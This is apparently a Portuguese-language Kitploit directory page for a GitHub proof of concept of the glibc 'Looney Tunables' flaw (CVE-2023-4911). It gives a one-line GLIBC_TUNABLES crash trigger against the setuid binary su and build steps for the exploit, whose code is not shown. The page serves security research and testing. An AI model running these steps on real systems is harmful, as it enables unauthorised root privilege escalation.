Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
looney-tunables-CVE-2023-4911 | Kitploit
Ferramentas/GitHubGitHub/hadrian3689/looney-tunables-cve-2023-4911
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubhadrian3689/looney-tunables-cve-2023-4911

looney-tunables-CVE-2023-4911

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
296há 2 anosRevisado pelo Kitploit

PoC do CVE-2023-4911 Looney Tunables

Este é um PoC do CVE-2023-4911 (também conhecido como "Looney Tunables") que explora uma falha na função de análise da variável de ambiente GLIBC_TUNABLES do carregador dinâmico glibc, a função parse_tunables().

Introdução

Executando o programa

  • Podemos verificar se o alvo é vulnerável
root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
  • Se obtivermos um Segmentation fault (core dumped), então estamos lidando com um alvo vulnerável.

Executando o programa

  • Crie o arquivo libc.so.6
root@kitploit:~
python3 libc.py
  • Compile o exploit
root@kitploit:~
gcc exp.c -o exp

Aviso Legal

Todo o código fornecido neste repositório é apenas para fins educacionais/de pesquisa. Quaisquer ações e/ou atividades relacionadas ao material contido neste repositório são de sua exclusiva responsabilidade. O uso indevido do código neste repositório pode resultar em acusações criminais contra as pessoas em questão. O autor não será responsabilizado no caso de quaisquer acusações criminais serem feitas contra qualquer pessoa que faça uso indevido do código neste repositório para infringir a lei.

Baixar ferramenta